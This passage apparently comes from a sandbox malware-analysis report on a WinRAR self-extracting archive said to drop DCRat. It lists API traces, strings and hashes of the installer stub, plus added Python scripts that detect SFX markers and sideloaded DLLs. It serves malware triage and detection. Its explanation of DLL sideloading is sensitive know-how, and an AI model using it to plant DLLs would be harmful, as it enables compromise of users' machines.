                    • Part of subcall function 00A0D287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A0D2D9
                  • CloseHandle.KERNEL32(00000000), ref: 00A0D697
                  • GetModuleFileNameW.KERNEL32(00000000,00A4DC90,00000800), ref: 00A0D6B2
                  • SetEnvironmentVariableW.KERNEL32(sfxname,00A4DC90), ref: 00A0D6BE
                  • GetLocalTime.KERNEL32(?), ref: 00A0D6C9
                  • _swprintf.LIBCMT ref: 00A0D708
                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A0D71A
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00A0D721
                  • LoadIconW.USER32(00000000,00000064), ref: 00A0D738
                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00A0D789
                  • Sleep.KERNEL32(?), ref: 00A0D7B7
                  • DeleteObject.GDI32 ref: 00A0D7F0
                  • DeleteObject.GDI32(?), ref: 00A0D800
                  • CloseHandle.KERNEL32 ref: 00A0D843
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                  • API String ID: 788466649-3743209390
                  • Opcode ID: 5a1b850f644c75d8d7e8260e21b21b129fffa098cc1b86d2b5b8d6cb3c640c29
                  • Instruction ID: 78170d27319e09763b92f8994323f429123da9995621b6e7fa51efafbf044fbd
                  • Opcode Fuzzy Hash: 5a1b850f644c75d8d7e8260e21b21b129fffa098cc1b86d2b5b8d6cb3c640c29
                  • Instruction Fuzzy Hash: 6E61D276904358AFD720EBE8FD49F7B37A8BB86741F000428F545921D1DBB9C906CBA2
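The API and string lists above are the SFX stub's start-up path: it reads the command line, opens the winrarsfxmappingfile.tmp file mapping, publishes sfxcmd, sfxpar, sfxname and sfxstime as environment variables (sfxstime is built by _swprintf from GetLocalTime with "%4d-%02d-%02d-%02d-%02d-%02d-%03d") and shows the STARTDLG dialog. All of these strings are handed to W-suffixed APIs, so in the image and in the memory dumps they are UTF-16LE, which an ASCII-only strings pass does not find. The following is an added example written for this report, not code from Joe Sandbox, WinRAR or the sample: it scans a byte buffer for the report's marker strings in both encodings and decodes an sfxstime value. The marker list, the function names, the three-marker threshold and the sample buffer are my own constructions.

```python
import re
from datetime import datetime

# Marker strings for the WinRAR SFX stub, taken from the String ID lines of
# this report. The list itself is my selection, not something the stub exports.
SFX_MARKERS = (
    "winrarsfxmappingfile.tmp",
    "__tmp_rar_sfx_access_check_%u",
    "STARTDLG",
    "LICENSEDLG",
    "sfxname",
    "sfxstime",
    "sfxcmd",
    "sfxpar",
    '-el -s2 "-d%s" "-sp%s"',
    "%4d-%02d-%02d-%02d-%02d-%02d-%03d",
)


def find_sfx_markers(blob: bytes) -> dict:
    """Return {marker: [encodings found]} for every marker present in blob.

    The stub hands these strings to W-suffixed APIs, so in the image and in
    memory they are UTF-16LE; the narrow form is checked too so a decoded or
    re-encoded dump is not missed.
    """
    hits = {}
    for marker in SFX_MARKERS:
        encodings = []
        if marker.encode("ascii") in blob:
            encodings.append("ascii")
        if marker.encode("utf-16-le") in blob:
            encodings.append("utf-16-le")
        if encodings:
            hits[marker] = encodings
    return hits


def looks_like_winrar_sfx(blob: bytes, min_markers: int = 3) -> bool:
    """Heuristic: three or more distinct markers present (threshold is mine)."""
    return len(find_sfx_markers(blob)) >= min_markers


# sfxstime layout from the _swprintf format above: SYSTEMTIME fields as
# filled by GetLocalTime (year, month, day, hour, minute, second, millisecond).
SFXSTIME_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})-(\d{2})-(\d{2})-(\d{2})-(\d{3})$")


def is_sfxstime(value: str) -> bool:
    return SFXSTIME_RE.match(value) is not None


def parse_sfxstime(value: str) -> datetime:
    """Decode an sfxstime environment value; raises ValueError if malformed."""
    m = SFXSTIME_RE.match(value)
    if m is None:
        raise ValueError(f"not an sfxstime value: {value!r}")
    year, mon, day, hour, minute, sec, ms = (int(g) for g in m.groups())
    return datetime(year, mon, day, hour, minute, sec, ms * 1000)


def constructed_sample() -> bytes:
    """Constructed stand-in for a memory dump: padding plus a few markers."""
    return (
        b"MZ\x90\x00" + b"\x00" * 32
        + "winrarsfxmappingfile.tmp".encode("utf-16-le") + b"\x00\x00"
        + "STARTDLG".encode("utf-16-le") + b"\x00\x00"
        + b"sfxname\x00"          # narrow copy, as a decoded dump might carry
        + "sfxstime".encode("utf-16-le") + b"\x00\x00"
        + b"\x00" * 16
    )


if __name__ == "__main__":
    sample = constructed_sample()
    print(find_sfx_markers(sample))
    print(looks_like_winrar_sfx(sample))
    print(parse_sfxstime("2024-06-19-13-05-42-017"))
```

In practice feed it the .sdmp listed under Memory Dump Source, or the sample itself. Hits on several markers plus the winrarsfxmappingfile.tmp mapping name say the outer layer is the stock WinRAR SFX module, so analysis effort belongs on the archived payload (here the dropped DCRat) rather than on the stub's own code.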

                  Control-flow Graph (rendered graph omitted; legend: executed / not executed)
                  • Basic blocks a09e1c-a09f32: FindResourceW -> SizeofResource -> LoadResource -> LockResource -> GlobalAlloc -> GlobalLock -> call a0f4b0 -> call a09d7b -> GdipCreateHBITMAPFromBitmap -> GlobalUnlock -> GlobalFree (PNG resource converted to an HBITMAP)
                  APIs
                  • FindResourceW.KERNEL32(00A0AE4D,PNG,?,?,?,00A0AE4D,00000066), ref: 00A09E2E
                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E46
                  • LoadResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E59
                  • LockResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E64
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A0AE4D,00000066), ref: 00A09E82
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00A0AE4D,00000066), ref: 00A09E93
                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A09EFC
                  • GlobalUnlock.KERNEL32(00000000), ref: 00A09F1B
                  • GlobalFree.KERNEL32(00000000), ref: 00A09F22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                  • String ID: PNG
                  • API String ID: 4097654274-364855578
                  • Opcode ID: b9c0bdd06843b9fec36c341ffc045b9dc9a58912d18bea50e7a72ab8a7d20c87
                  • Instruction ID: b8091240701ae4fe42b107d20e40ac0a28ed26cc01d28355a362c7047582b795
                  • Opcode Fuzzy Hash: b9c0bdd06843b9fec36c341ffc045b9dc9a58912d18bea50e7a72ab8a7d20c87
                  • Instruction Fuzzy Hash: 5931A77220431AAFCB20DF65EC48D2BBBADFF86751B044528F902D22A1DB35DC12CB60

                  Control-flow Graph (rendered graph omitted; legend: executed / not executed)
                  • Basic blocks 9fa5f4-9fa774: FindFirstFileW (two call sites, the second after call 9fb66c) -> GetLastError; FindNextFileW -> GetLastError
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA628
                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA65E
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA66A
                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA692
                  • GetLastError.KERNEL32(?,?,?,?,009FA4EF,000000FF,?,?), ref: 009FA69E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileFind$ErrorFirstLast$Next
                  • String ID:
                  • API String ID: 869497890-0
                  • Opcode ID: 59b8de0c727396526a06f892c3379b0389c53afa87d28b11756e2577929a8365
                  • Instruction ID: 5481f58c8300160fb6d8d6566c51c0656dcbbe103acbc2d6bc027d256a294c2a
                  • Opcode Fuzzy Hash: 59b8de0c727396526a06f892c3379b0389c53afa87d28b11756e2577929a8365
                  • Instruction Fuzzy Hash: B341A772504645AFC724EF78C884AEAF7ECBF49354F040929F6DDD3240D734A9558B52
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002,00000000), ref: 00A1755E
                  • TerminateProcess.KERNEL32(00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002,00000000), ref: 00A17565
                  • ExitProcess.KERNEL32 ref: 00A17577
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 99c23127ddd1d81480a737299e329c196a5eebbedf77f6c444af296b6d2b597f
                  • Instruction ID: 2f50d13d0d8ffc9b6a4f6b855dccd79693e0247d62be76250fd59cba9acce942
                  • Opcode Fuzzy Hash: 99c23127ddd1d81480a737299e329c196a5eebbedf77f6c444af296b6d2b597f
                  • Instruction Fuzzy Hash: DDE0BF32104544ABCF21EF58DE09A993B7AEF51791F104424F9064A132CB39DE93CA51
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID:
                  • API String ID: 3004599000-0
                  • Opcode ID: 139347f17635e67b6e5c8112dff8162f533576b5cb82e0509f7896a2ab5e33f7
                  • Instruction ID: 41a9aa34c981961fe4714a9c775c2e216f9f1b6e49f99be6ca7941bf61450737
                  • Opcode Fuzzy Hash: 139347f17635e67b6e5c8112dff8162f533576b5cb82e0509f7896a2ab5e33f7
                  • Instruction Fuzzy Hash: 23821C7090424DAEDF65DF64C885BFBBBBDAF15300F0845B9EA599B182DF305A48CB60
                  APIs
                  • __EH_prolog.LIBCMT ref: 00A0AEE5
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prologItemTextWindow
                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                  • API String ID: 810644672-8108337
                  • Opcode ID: ba8e6ec94e65f036406c9d7a05ca29afae44676f6c1401dfc6046d591c298a5e
                  • Instruction ID: 65a96c63dc32865d27163ac2e2efdea699802648c6ed41edf0fc5fdfb36504b4
                  • Opcode Fuzzy Hash: ba8e6ec94e65f036406c9d7a05ca29afae44676f6c1401dfc6046d591c298a5e
                  • Instruction Fuzzy Hash: 0342E071954359BEEB21EBF0AE8AFBE7B7CAB12701F004154F245A60E1CB784946CB71

                  Control-flow Graph (rendered graph omitted; legend: executed / not executed)
                  • Basic blocks a000cf-a00679: GetModuleHandleW -> GetProcAddress -> GetProcAddress; GetModuleFileNameW -> CreateFileW -> SetFilePointer -> ReadFile -> CloseHandle; GetModuleFileNameW, CompareStringW, GetFileAttributesW (two sites); warning path: _swprintf, AllocConsole -> GetCurrentProcessId -> AttachConsole -> GetStdHandle -> WriteConsoleW -> Sleep -> FreeConsole -> ExitProcess
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32), ref: 00A000E4
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A000F6
                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A00127
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A003D4
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A003F0
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A00402
                  • ReadFile.KERNEL32(00000000,?,00007FFE,00A23BA4,00000000), ref: 00A00421
                  • CloseHandle.KERNEL32(00000000), ref: 00A00479
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A0048F
                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00A004E7
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00A00510
                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00A0054A
                    • Part of subcall function 00A00085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                    • Part of subcall function 00A00085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  • _swprintf.LIBCMT ref: 00A005BE
                  • _swprintf.LIBCMT ref: 00A0060A
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • AllocConsole.KERNEL32 ref: 00A00612
                  • GetCurrentProcessId.KERNEL32 ref: 00A0061C
                  • AttachConsole.KERNEL32(00000000), ref: 00A00623
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A00649
                  • WriteConsoleW.KERNEL32(00000000), ref: 00A00650
                  • Sleep.KERNEL32(00002710), ref: 00A0065B
                  • FreeConsole.KERNEL32 ref: 00A00661
                  • ExitProcess.KERNEL32 ref: 00A00669
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                  • API String ID: 1201351596-3298887752
                  • Opcode ID: 852856e0099cf4f3bda12869e32ddf52f69e38db9130d0f11115bd4bb0e8cac6
                  • Instruction ID: e7c7963295af2ed228d03db035b02631b58b08c5df3c3347df86d527f5103c1b
                  • Opcode Fuzzy Hash: 852856e0099cf4f3bda12869e32ddf52f69e38db9130d0f11115bd4bb0e8cac6
                  • Instruction Fuzzy Hash: 64D17872108354ABDB30DF58F949FAFB6E8BF86704F00492DF68596180D7B886498F66
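The function above is the stub's DLL-planting guard. It resolves SetDllDirectoryW and SetDefaultDllDirectories from kernel32 by name (so the stub still runs where they are absent), then looks beside its own image (GetModuleFileNameW) for DXGIDebug.dll, dwmapi.dll and uxtheme.dll, using CompareStringW with flags 0x1001 (NORM_IGNORECASE | SORT_STRINGSORT) and GetFileAttributesW. If one is present it allocates a console, writes "Please remove %s from %s folder. It is unsecure to run %s until it is done.", sleeps 0x2710 ms (10 s) and calls ExitProcess. The reason for the check: under the default search order the application directory is consulted before System32, so a DLL with one of these names dropped next to the SFX would be loaded instead of the system copy (unless the name is a KnownDLL). In triage the same check is useful from the other side: a sample delivered with one of these DLLs beside it signals a sideloading stage. The following added example (mine, not WinRAR's or the report's code) reproduces the check on disk: planted_dlls_beside reports the guarded names next to one executable, scan_tree_for_sideload_candidates does it for every .exe under a directory, and build_demo_tree creates a constructed fixture in a temporary directory. PLANTED_DLL_NAMES and all function names are my own.

```python
import os
import tempfile
from pathlib import Path

# DLL names the stub's guard looks for, taken from the String ID line above.
# Under the default search order the application directory is searched before
# System32, so a DLL with one of these names beside the executable would be
# loaded instead of the system copy.
PLANTED_DLL_NAMES = ("DXGIDebug.dll", "dwmapi.dll", "uxtheme.dll")


def planted_dlls_beside(exe_path) -> list:
    """Guarded DLL names present in the executable's own directory.

    Matching is case-insensitive, as the stub's CompareStringW call with
    NORM_IGNORECASE is, and as NTFS name lookup is.
    """
    exe = Path(exe_path)
    present = {p.name.lower() for p in exe.parent.iterdir() if p.is_file()}
    return [name for name in PLANTED_DLL_NAMES if name.lower() in present]


def scan_tree_for_sideload_candidates(root) -> dict:
    """Map every .exe under root (path relative to root, POSIX form) to the
    guarded DLL names found in its directory. Directories with no such DLL
    are skipped, so an empty dict means nothing to look at."""
    root = Path(root)
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        present = {f.lower() for f in files}
        hit = [name for name in PLANTED_DLL_NAMES if name.lower() in present]
        if not hit:
            continue
        for f in files:
            if f.lower().endswith(".exe"):
                rel = (Path(dirpath) / f).relative_to(root).as_posix()
                findings[rel] = hit
    return findings


def build_demo_tree() -> dict:
    """Constructed fixture in a temp dir: a clean folder and one with a
    planted DWMAPI.DLL (upper-case on purpose) beside the sample's name."""
    root = Path(tempfile.mkdtemp(prefix="sfx_guard_demo_"))
    clean = root / "clean"
    clean.mkdir()
    (clean / "DFpUKTL6kg.exe").write_bytes(b"MZ")
    planted = root / "planted"
    planted.mkdir()
    (planted / "DFpUKTL6kg.exe").write_bytes(b"MZ")
    (planted / "DWMAPI.DLL").write_bytes(b"MZ")
    return {
        "root": str(root),
        "clean_exe": str(clean / "DFpUKTL6kg.exe"),
        "planted_exe": str(planted / "DFpUKTL6kg.exe"),
    }


if __name__ == "__main__":
    demo = build_demo_tree()
    print(planted_dlls_beside(demo["planted_exe"]))   # ['dwmapi.dll']
    print(planted_dlls_beside(demo["clean_exe"]))     # []
    print(scan_tree_for_sideload_candidates(demo["root"]))
```

Run it against the directory the sample was delivered in (here C:\Users\user\Desktop according to the String ID line). The stub's guard covers only the three names it was built with; a triage scan should not treat that list as exhaustive.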

                  Control-flow Graph (rendered graph omitted; legend: executed / not executed)
                  • Basic blocks a0bdf5-a0ca9d: ExpandEnvironmentStringsW (via call a0aa36); SetWindowTextW; SetFileAttributesW -> GetFileAttributesW -> DeleteFileW -> GetFileAttributesW -> MoveFileW -> MoveFileExW; GetDlgItem -> SetWindowTextW -> SendMessageW; SendMessageW
                  APIs
                  • __EH_prolog.LIBCMT ref: 00A0BDFA
                    • Part of subcall function 00A0AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A0AAFE
                  • SetWindowTextW.USER32(?,?), ref: 00A0C127
                  • _wcsrchr.LIBVCRUNTIME ref: 00A0C2B1
                  • GetDlgItem.USER32(?,00000066), ref: 00A0C2EC
                  • SetWindowTextW.USER32(00000000,?), ref: 00A0C2FC
                  • SendMessageW.USER32(00000000,00000143,00000000,00A3A472), ref: 00A0C30A
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A0C335
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                  • API String ID: 3564274579-312220925
                  • Opcode ID: f8779be3c41d6c671eee0c37132202bbf5a87b4f76a2baa7dde91aeb9ed52583
                  • Instruction ID: 3dcf2834c673531f1c1349033400ce0971e256d772a525b0d36f470feb97ff67
                  • Opcode Fuzzy Hash: f8779be3c41d6c671eee0c37132202bbf5a87b4f76a2baa7dde91aeb9ed52583
                  • Instruction Fuzzy Hash: 80E19272D0021CAADF25DBA4ED45EEF737DAF08761F0041A6F605E3091EB709A85CB60

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 561 9fd341-9fd378 call a0e28c call a0e360 call a115e8 568 9fd3ab-9fd3b4 call 9ffe56 561->568 569 9fd37a-9fd3a9 GetModuleFileNameW call 9fbc85 call 9ffe2e 561->569 573 9fd3b9-9fd3dd call 9f9619 call 9f99b0 568->573 569->573 580 9fd3e3-9fd3eb 573->580 581 9fd7a0-9fd7a6 call 9f9653 573->581 583 9fd3ed-9fd405 call a03781 * 2 580->583 584 9fd409-9fd438 call a15a90 * 2 580->584 586 9fd7ab-9fd7bb 581->586 594 9fd407 583->594 595 9fd43b-9fd43e 584->595 594->584 596 9fd56c-9fd58f call 9f9d30 call a135d3 595->596 597 9fd444-9fd44a call 9f9e40 595->597 596->581 606 9fd595-9fd5b0 call 9f9bf0 596->606 601 9fd44f-9fd476 call 9f9bf0 597->601 607 9fd47c-9fd484 601->607 608 9fd535-9fd538 601->608 623 9fd5b9-9fd5cc call a135d3 606->623 624 9fd5b2-9fd5b7 606->624 611 9fd4af-9fd4ba 607->611 612 9fd486-9fd48e 607->612 609 9fd53b-9fd55d call 9f9d30 608->609 609->595 628 9fd563-9fd566 609->628 614 9fd4bc-9fd4c8 611->614 615 9fd4e5-9fd4ed 611->615 612->611 617 9fd490-9fd4aa call a15ec0 612->617 614->615 620 9fd4ca-9fd4cf 614->620 621 9fd4ef-9fd4f7 615->621 622 9fd519-9fd51d 615->622 632 9fd4ac 617->632 633 9fd52b-9fd533 617->633 620->615 629 9fd4d1-9fd4e3 call a15808 620->629 621->622 630 9fd4f9-9fd513 call a15ec0 621->630 622->608 631 9fd51f-9fd522 622->631 623->581 639 9fd5d2-9fd5ee call a0137a call a135ce 623->639 625 9fd5f1-9fd5f8 624->625 636 9fd5fc-9fd625 call 9ffdfb call a135d3 625->636 637 9fd5fa 625->637 628->581 628->596 629->615 644 9fd527 629->644 630->581 630->622 631->607 632->611 633->609 651 9fd627-9fd62e call a135ce 636->651 652 9fd633-9fd649 636->652 637->636 639->625 644->633 651->581 654 9fd64f-9fd65d 652->654 655 9fd731-9fd757 call 9fce72 call a135ce * 2 652->655 657 9fd664-9fd669 654->657 694 9fd759-9fd76f call a03781 * 2 655->694 695 9fd771-9fd79d call a15a90 * 2 655->695 659 9fd66f-9fd678 657->659 660 9fd97c-9fd984 657->660 662 9fd67a-9fd67e 659->662 663 9fd684-9fd68b 659->663 664 9fd72b-9fd72e 660->664 665 9fd98a-9fd98e 660->665 662->660 662->663 667 9fd691-9fd6b6 663->667 668 9fd880-9fd891 call 9ffcbf 663->668 664->655 669 9fd9de-9fd9e4 665->669 670 9fd990-9fd996 665->670 675 9fd6b9-9fd6de call a135b3 call a15808 667->675 686 9fd897-9fd8c0 call 9ffe56 call a15885 668->686 687 9fd976-9fd979 668->687 673 9fda0a-9fda2a call 9fce72 669->673 674 9fd9e6-9fd9ec 669->674 676 9fd99c-9fd9a3 670->676 677 9fd722-9fd725 670->677 699 9fda02-9fda05 673->699 674->673 680 9fd9ee-9fd9f4 674->680 713 9fd6f6 675->713 714 9fd6e0-9fd6ea 675->714 683 9fd9ca 676->683 684 9fd9a5-9fd9a8 676->684 677->657 677->664 680->677 689 9fd9fa-9fda01 680->689 688 9fd9cc-9fd9d9 683->688 692 9fd9aa-9fd9ad 684->692 693 9fd9c6-9fd9c8 684->693 686->687 721 9fd8c6-9fd93c call a01596 call 9ffdfb call 9ffdd4 call 9ffdfb call a158d9 686->721 687->660 688->677 689->699 701 9fd9af-9fd9b2 692->701 702 9fd9c2-9fd9c4 692->702 693->688 694->695 695->581 707 9fd9be-9fd9c0 701->707 708 